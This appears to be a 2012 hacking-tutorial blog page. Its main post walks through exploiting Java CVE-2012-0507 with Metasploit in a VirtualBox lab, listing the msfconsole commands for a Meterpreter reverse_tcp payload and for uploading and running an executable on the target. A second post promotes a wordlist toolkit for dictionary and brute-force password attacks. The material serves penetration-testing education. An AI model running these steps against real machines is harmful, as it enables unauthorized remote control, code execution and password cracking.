Get FREE lessons from "Hack It Easy Hacking Course"

Enter your email and instantly receive the lessons in your inbox for free

Tuesday, September 25, 2012

How to hack easily a remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507

Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).
About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a Free Course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:


Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:

Hey, where are you going?  Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:
  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than  600,000 Mac computers by exploiting this vulnerability. Recently, The  INSS  , The  Amnesty International UK
 websites injected with malicious code that exploit the CVE-2012-0507. I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this:  setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II:Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the  java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download  CVE-2012-0507.jar  and paste in this folder "/opt/metasploit/msf3/data/exploits/"
Part III : 

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:


Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module. 



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload 
Type "show payloads", this will display the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST.  

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10. 

Now  Type in the msfconsole as "set LHOST 192.168.56.10". 



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine. 

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2: 

Open the Firefox/IE in the Target machine.  
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.



Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.



For Example, Typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.

conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..! 

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me.

Monday, September 24, 2012

Unleash the power Backtrack 5 with thad0ctor Toolkit

The backbone of thad0ctor’s Backtrack 5 Toolkit is the Wordlist Toolkit that contains a plethora of tools to create, modify, and manipulate word lists in order for end users to strengthen their systems by testing their passwords against a variety of tools designed to expose their pass phrases. In short it is the ultimate tool for those looking to make a wide variety of word lists for dictionary based and other brute force attacks.
The toolkit is designed with usability in mind for the Backtrack 5R2 Linux distro but will also work on BT5 R1 and other Ubuntu based distros if configured properly. The script is constantly updated with multiple revisions to include new cutting edge features and improvements in order to provide full spectrum wordlist creation capabilities.
Features
  • Create word lists for SSNs, Phone Numbers, Date Ranges, Random Patterns, Password Policies, Patterns, from PDF/EBOOK files, for Default Router Passwords, or by profiling targets
  • Manipulate word lists by changing character cases, mirroring or doubling up words, reversing words prefixing or appending sequences of numbers or characters, inserting text, removing patterns or characters, converting words to 1337 speak, mangling words with John the Ripper and more
  • Optimize word lists by converting them to ASCII, trimming the words to set minimum and maximum lengths, sorting and removing duplicates, removing non-printable characters, splitting word lists into more manageable chunks and more
  • Analyzes word lists by viewing their line count, a break down of their most common patterns and characters used, search word lists for a certain string or sub-string, and calculate the time it would take to process a word list through a aircrack-ng or pyrit based dictionary attack
  • Combine individual word lists or word lists of a directory into a single word list and gather word lists system wide into one directory
  • Fully customize the usage of the script to streamline functionality. Change console output text color, configure passthough attack options for certain attacks, toggle or force on or off the GTK and CLI versions of the script, toggle whether or not to display the start up banner, toggle the main menu style and customize the script 1337ify options.
  • Stay up to date with a fully integrated and fool proof update system that pulls directly from the script’s Sourceforge for up to the minute updates and configure whether or not you would like to auto-update the script on start up.
  • Make sure everything is working properly and dependencies are met with an automated dependency check and install system that takes all the pain and guesswork out of dependency issues.
First Download thad0ctor Toolkit from here on your desktop
Now unzip the file unzip thad0ctors.zip
\"unzip
Now you can start it with./LAUNCH_TOOLKIT.sh
\"0
\"1
\"2
Now choose option 1 wordlist tools (creation, Manipulation, Combination, and Analyzation)
\"wordlist
In main menu choose option 2 for wifi tools
\"wifi
In main menu choose option 3 for view all this script’s word list tools
\"all+scripts
In main menu choose option c for configure /Install Scripts and Shortcuts /check dependencies
\"configure
In main menu choose option I for Info / Readme /Upgrade /chagelog /Debug Info /Dev, RSS Feed
\"info

x

   First Name:
* Your Email Address:
 

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More